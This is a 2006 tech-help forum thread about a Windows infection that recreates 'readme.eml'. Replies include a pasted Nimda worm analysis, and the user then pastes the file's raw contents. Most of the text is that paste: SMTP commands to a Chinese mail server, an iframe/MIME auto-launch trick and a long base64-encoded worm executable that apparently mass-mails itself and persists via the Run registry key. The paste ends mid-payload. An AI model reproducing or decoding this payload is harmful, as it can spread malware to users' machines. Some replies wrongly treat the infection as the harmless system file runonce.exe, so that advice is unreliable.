bi11gates Posted January 25, 2006 Share Posted January 25, 2006 I am now adays in some really damn big problem. It all started when my younger brother(damn) copied a game he obtained from my cousin. Ok, game went well but my computer is certainly in trouble. The file "runonce.exe" starts with my pc.although i try to stop it with my "startup monitor", it does,nt work. The file creates "outlook express mail message" named "readme.eml"whenever i delete "runonce.exe" from system32 folder in windows directory, it comes back. main problem lies in the fact that i have FORMATTED C drive twice but the file still comes back and starts its activity---------->creating "readme.eml" I DONT FIND A SOLUTION EXCEPT TO REPLACE MY HARD-DIsk.Because the file has even created readme.eml in my second 10 GB hard-disk. SO Can u help me guys. so if i purchase a new hard-drive, does it have a chance of going into that too ? :angry: I have even deleted the game whose name was "midnight rider" It has even created problem with some programs i have downloaded from internet like Quicktime,Msn Messenger. They are not being installed Link to comment Share on other sites More sharing options...
dj6ross Posted January 25, 2006 Share Posted January 25, 2006 http://www.liutilities.com/products/wintas...ibrary/runonce/ Not a virus. Not sure about the other stuff your talking about though. Link to comment Share on other sites More sharing options...
bi11gates Posted January 25, 2006 Author Share Posted January 25, 2006 If its not a virus then why does it comeback even after FORMAT and created readme.eml files :no: Link to comment Share on other sites More sharing options...
Panacik Posted January 25, 2006 Share Posted January 25, 2006 Is this "startup monitor" program telling you all this? Runonce is a system file and is found in the registry. Do not remove this as some files may not work correctly. When you say you formatted, did you fdisk? Did you do an unconditional fomat or quick erase? We might be able to help you further with this info mate. Also post your OS and PC specs. Cheers, Rich Link to comment Share on other sites More sharing options...
EZRecovery Posted January 25, 2006 Share Posted January 25, 2006 runonce - runonce.exe - Process Information Process File: runonce or runonce.exe Process Name: Runonce Description: runonce.exe is the Microsoft Run Once wrapper. It is used by the installation programs for third party applications. It allows the installation program to startup again after boot up to give the user the possibility to make further configurations. This process should not be removed ro ensure that programs are installed correctly on your system. For More Information About runonce.exe - Get WinTasks 5 Pro Now! Recommendation for runonce.exe: Should not be disabled, required for essential applications to work properly. http://www.liutilities.com/products/wintas...ibrary/runonce/ /EZ Link to comment Share on other sites More sharing options...
Jonezy712 Posted January 25, 2006 Share Posted January 25, 2006 try goin to Run --> type msconfig and click the startup tab, then find runonce.exe on that list and disable it?... Link to comment Share on other sites More sharing options...
Panacik Posted January 25, 2006 Share Posted January 25, 2006 try goin to Run --> type msconfig and click the startup tab, then find runonce.exe on that list and disable it?... Or dont! This is a system file and should not be stopped from running. Link to comment Share on other sites More sharing options...
bi11gates Posted January 25, 2006 Author Share Posted January 25, 2006 I am now running Windows 2000 after formatting previous windows xp install. My PC is 1.5 GHZ, P4. ok leave runonce.exe but what about "readme.eml"HOw does it come back one way r the other :o Link to comment Share on other sites More sharing options...
Panacik Posted January 25, 2006 Share Posted January 25, 2006 I am now running Windows 2000 after formatting previous windows xp install. My PC is 1.5 GHZ, P4. ok leave runonce.exe but what about "readme.eml"HOw does it come back one way r the other :o It may be possible that you DO have some type of virus. Please tell me what type of format are you performing on the drive? Unconditional or Quick? Link to comment Share on other sites More sharing options...
Panacik Posted January 25, 2006 Share Posted January 25, 2006 W32/Nimda.A-MM In-Depth Analysis Visible Symptoms Network or system slowdown Emails arrive from infected users with an attachment most commonly named "README.EXE" Creation of these files on the local system - Admin.dll Readme.eml Load.exe Possible firewall alerts that a file named "MEP????.TMP.EXE" is attempting to access various DNS IP addresses, where "????" could be any number or character Infected executables have a file icon resembling an Internet Explorer document file Threat Analysis Viral body is 57344 bytes and is prepended to EXE files Virus uses various exploit and infection methods in order to infect the potential host - Malformed MIME header and IFrame exploit within email propagation Infectious Riched20.dll placed in DOC folder - Riched20.dll will load by default when a .DOC file is opened INDEX.HTML / DEFAULT.HTML file load insertion - files are modified to load infectious README.EML SYSTEM.INI file load insertion EXE infection - virus prepends itself to target files Network spreading - virus attempts to connect to open shares and copy itself to these locations Infectious README.EML / DESKTOP.EML placed in all folders IP scanning to identify IIS systems and using malformed GET request - response uploads infectious ADMIN.DLL to the target system and executes it Hiding extensions of known file types - this aids in the launch of an executable with an inappropriate file icon Virus arrives as an attachment from infected users in a message structured such that a malformed MIME header exploit coupled with an IFrame exploit will cause the attachment to launch automatically when the message is either opened or previewed in Outlook The message contains two parts, one being script containing the IFrame exploit which invokes the second part, which is mislabeled on purpose with an inappropriate Content-Type of "audio/x-wav" - this is done in an effort to automatically launch the attachment commonly named "readme.exe". When first executed, the virus will write two files into the Windows\Temp folder and execute one of them - the files may be named similar to "mepF050.TMP.exe" - the virus will also write a WININIT.INI configuration file which will delete the files written to the Temp folder at next Windows startup. Virus will write itself as "load.exe" to the Windows\System folder, then modify the SYSTEM.INI file to run the virus secondary to loading the shell Explorer.exe with a parameter "-dontrunold" Virus modifies the registry to hide the extensions of known file types and to not display hidden files - if infected users attempt to modify these values manually within the "View | Folder Options" menu option in a folder view, the settings are reset by the virus to continue hiding extensions and not display hidden files Virus attempts to scan IP addresses in search of a system running IIS in an effort to infect that host - the virus uses a "Transversal Directory" exploit in order to sends a malformed "GET Admin.dll" request, which in turn triggers the target to request the infectious ADMIN.DLL from the requestor via TFTP ADMIN.DLL will be executed on the target system and infect files matching these names - Index.XXX Default.XXX Main.XXX Where .XXX could be .asp, .htm or .html - virus drops a file "Readme.eml" on the target and modifies the qualifying files to load the .eml file using the HTML instruction "refresh" Virus copies itself to numerous locations as the following files - readme.nws readme.eml readme.doc (and infectious) riched20.dll readme.exe mmc.exe Virus modifies the registry to share all local drives C through Z - after a Windows restart the drives would be fully shared - virus then attempts to copy itself to systems available across the network Virus contains the following string - Concept Virus(CV) V.5, Copyright©2001 R.P.China Unconditional format should solve the poblem, whereas a quick erase may leave the virus on the mahine. Link to comment Share on other sites More sharing options...
bi11gates Posted January 25, 2006 Author Share Posted January 25, 2006 Here,s what lies in "readme.eml" HELO btamail.net.cn MAIL FROM: imissyou@btamail.net.cn RCPT TO: DATA FROM: MIQROZOF-9J4FK3@yahoo.com TO: SUBJECT: MIQROZOF-9J4FK3 is comming! MIME-Version: 1.0 Content-type: multipart/mixed; boundary="#BOUNDARY#" --#BOUNDARY# Content-Type: text/html Content-Transfer-Encoding: quoted-printable <html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html> --#BOUNDARY# MIME-Version: 1.0 Content-Type: audio/x-wav; name="pp.exe" Content-Transfer-Encoding: base64 Content-id: THE-CID TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAtSzvggAAAAAAAAAA4ACOgQsBAhkAAgAAAAYAAAAAAAAARAAAABAAAAAgAAAAAEAAABAAAAACAAABAAAAAAAAAAMACgAAAAAAAGAAAAAEAAAAAAAAAgAAAAAAEAAAIAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAADAAAE4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ09ERQAAAAAAEAAAABAAAAACAAAABgAAAAAAAAAAAAAAAAAAIAAAYERBVEEAAAAAABAAAAAgAAAAAgAAAAgAAAAAAAAAAAAAAAAAAEAAAMAuaWRhdGEAAAAQAAAAMAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAADALnJlbG9jAAD8HQAAAEAAAPwdAAAADAAAAAAAAAAAAAAAAAAAQAAA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAw/8lMDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgwAAAAAAAAAAAAADgwAAAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGMAAAAAAAAEYwAAAAAAAAS0VSTkVMMzIuZGxsAAAAAFNsZWVwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAwAAAADMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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YW1lQQDoFAAAAFdpZGVDaGFyVG9NdWx0aUJ5dGUA6BAAAABUZXJtaW5hdGVUaHJlYWQA6A0AAABDcmVhdGVUaHJlYWQA6AgAAABfbGNyZWF0AOgUAAAAR2V0U3lzdGVtRGlyZWN0b3J5QQDoDwAAAFZpcnR1YWxBbGxvY0V4AOgUAAAAV2FpdEZvclNpbmdsZU9iamVjdADoDAAAAENsb3NlSGFuZGxlAOgTAAAAQ3JlYXRlS2VybmVsVGhyZWFkAOgTAAAAQ3JlYXRlUmVtb3RlVGhyZWFkAOgTAAAAV3JpdGVQcm9jZXNzTWVtb3J5AOgMAAAAT3BlblByb2Nlc3MA6BQAAABHZXRDdXJyZW50UHJvY2Vzc0lkAOgXAAAAUmVnaXN0ZXJTZXJ2aWNlUHJvY2VzcwDoBgAAAFNsZWVwAOgIAAAAX2xjbG9zZQDoCAAAAF9sbHNlZWsA6AgAAABfbHdyaXRlAOgHAAAAX2xyZWFkAOgHAAAAX2xvcGVuAOgMAAAAU2V0RmlsZVRpbWUA6BMAAABTZXRGaWxlQXR0cmlidXRlc0EA6AoAAABGaW5kQ2xvc2UA6A4AAABGaW5kTmV4dEZpbGVBAOgPAAAARmluZEZpcnN0RmlsZUEA6BUAAABTZXRDdXJyZW50RGlyZWN0b3J5QQDoDgAAAEdldERyaXZlVHlwZUEA6AgAAABXaW5FeGVjAOgQAAAAR2V0Q29tbWFuZExpbmVBAOgNAAAAR2V0TGFzdEVycm9yAOgNAAAAQ3JlYXRlTXV0ZXhBAOgNAAAATG9hZExpYnJhcnlBACvMwekC/+DpWIvM6AoAAAB3c3ByaW50ZkEA6A0AAABTZW5kTWVzc2FnZUEA6AoAAABHZXRXaW5kb3cA6AwAAABNZXNzYWdlQm94QQDoDAAAAEZpbmRXaW5kb3dBAOgZAAAAR2V0V2luZG93VGhyZWFkUHJvY2Vzc0lkACvMwekC/+DpWIvM6BgAAABSZWdOb3RpZnlDaGFuZ2VLZXlWYWx1ZQDoEQAAAFJlZ1F1ZXJ5VmFsdWVFeEEA6A8AAABSZWdTZXRWYWx1ZUV4QQDoDAAAAFJlZ09wZW5LZXlBACvMwekC/+DpWIvM6A4AAABXTmV0Q2xvc2VFbnVtAOgSAAAAV05ldEVudW1SZXNvdXJjZUEA6A4AAABXTmV0T3Bl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